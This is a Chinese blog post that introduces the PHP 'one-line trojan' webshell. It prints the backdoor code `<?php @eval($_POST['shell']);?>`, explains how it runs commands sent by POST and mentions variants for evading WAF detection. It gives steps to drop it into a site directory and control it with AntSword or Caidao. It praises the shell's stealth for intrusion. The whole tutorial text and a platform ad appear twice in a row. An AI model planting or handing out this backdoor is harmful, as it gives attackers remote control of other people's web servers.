一句话木马-php
2021-01-06 22:30:02 733浏览
一、什么是一句话木马?一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
今天给大家分享的是:php一句话木马
一.介绍
一句话木马就是一段简单得代码,就这短短得一行代码,就能做到和大马相当得功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大得作用。
二.原理
<?php @eval($_POST['shell']);?>
这是php得一句话后门中最普遍得一种。它得工作原理是:
首先存在一个名为shell得变量,shell得取值为HTTP得POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面得内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();
也可以用蚁剑或菜刀等工具连接(我这里用得是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell
然后就可以看到目标站点目录下得文件了
行,今天就给大家分享到这里吧,您的一份支持就是我最大的动力,最后打个小广告,我们程序员在学习和工作中或多或少会遇到一些比较棘手的问题,也就所谓的一时半会解决不了的bug,可以来杰凡IT问答平台上提问,平台上大佬很多可以快速给你一对一解决问题,有需要的朋友可以去关注下,平台网址: https://www.jf3q.com
一.介绍
一句话木马就是一段简单得代码,就这短短得一行代码,就能做到和大马相当得功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大得作用。
二.原理
<?php @eval($_POST['shell']);?>
这是php得一句话后门中最普遍得一种。它得工作原理是:
首先存在一个名为shell得变量,shell得取值为HTTP得POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面得内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();
也可以用蚁剑或菜刀等工具连接(我这里用得是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell
然后就可以看到目标站点目录下得文件了
行,今天就给大家分享到这里吧,您的一份支持就是我最大的动力,最后打个小广告,我们程序员在学习和工作中或多或少会遇到一些比较棘手的问题,也就所谓的一时半会解决不了的bug,可以来杰凡IT问答平台上提问,平台上大佬很多可以快速给你一对一解决问题,有需要的朋友可以去关注下,平台网址: https://www.jf3q.com
好博客就要一起分享哦!分享海报
此处可发布评论
评论(0)展开评论
暂无评论,快来写一下吧
展开评论
他的专栏
新业务 
springboot学习 
ssm框架课 
vue学习 他感兴趣的技术
